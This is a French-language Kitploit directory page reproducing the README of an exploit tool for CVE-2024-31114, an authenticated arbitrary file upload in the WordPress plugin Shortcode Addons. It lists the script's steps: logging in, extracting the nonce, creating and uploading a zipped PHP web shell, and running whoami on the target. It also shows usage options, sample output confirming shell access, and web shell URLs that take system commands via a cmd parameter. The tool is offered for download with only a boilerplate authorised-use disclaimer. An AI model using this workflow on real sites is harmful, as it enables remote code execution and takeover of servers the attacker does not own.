Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-31114 — Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload | Kitploit
Outils/GitHubGitHub/nxploited/cve-2024-31114
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubnxploited/cve-2024-31114

CVE-2024-31114

Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-31114 - Exploit RCE pour WordPress Shortcode Addons

Shortcode Addons <= 3.2.5 – Téléchargement arbitraire de fichiers authentifié (Admin+)
CVE ID: CVE-2024-31114
Score CVSS : 9.1 (Critique)


🛠️ Description de la vulnérabilité

Le plugin Shortcode Addons – avec Visual Composer, Divi, Beaver Builder et Elementor Extension pour WordPress est vulnérable aux téléchargements arbitraires de fichiers en raison de l'absence de validation du type de fichier dans toutes les versions jusqu'à la version 3.2.5 incluse.

Cette faille permet à des attaquants authentifiés disposant d'un accès de niveau administrateur ou supérieur de télécharger des fichiers arbitraires sur le serveur — ce qui peut entraîner une exécution de code à distance (RCE).


🚀 Description du script

Ce script Python automatise l'exploitation de la vulnérabilité. Il effectue :

  1. Désactivation de la vérification SSL
  2. Connexion avec les identifiants fournis
  3. Extraction du jeton CSRF (_wpnonce)
  4. Génération d'un shell PHP (nxploit.php)
  • Compression et téléchargement au format .zip
  • Confirmation du téléchargement et accès au shell
  • Exécution de whoami sur le serveur cible

  • 🧪 Utilisation

    root@kitploit:~
    usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD
    
    Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
    By: Nxploited | Khaled Alenazi
    
    options:
      -h, --help            Show this help message and exit
      -u, --url URL         Target URL (e.g. http://target.com)
      -un, --username USERNAME   WordPress Admin Username
      -p, --password PASSWORD    WordPress Admin Password
    

    📤 Exemple de sortie

    root@kitploit:~
    [+] Authentication successful.
    [+] _wpnonce extracted: 9d8dbbc630
    [+] Payload nxploit.zip created.
    [+] Payload uploaded.
    [+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
    [+] Command output:
    ------------------
    www-data
    ------------------
    [+] Temporary files removed.
    

    🐚 Utilisation du shell web

    Une fois la charge utile téléchargée, vous pouvez exécuter des commandes système en utilisant le format suivant :

    root@kitploit:~
    http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command
    

    🔹 Exemple :

    root@kitploit:~
    http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
    

    Cela listera le contenu du répertoire courant sur le serveur.


    ⚠️ Avertissement

    Cet outil est destiné uniquement à des fins éducatives et de tests autorisés.
    L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par ce script.

    Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous avez une autorisation explicite de test.


    Par : Nxploited | Khaled Alenazi

    Télécharger l’outil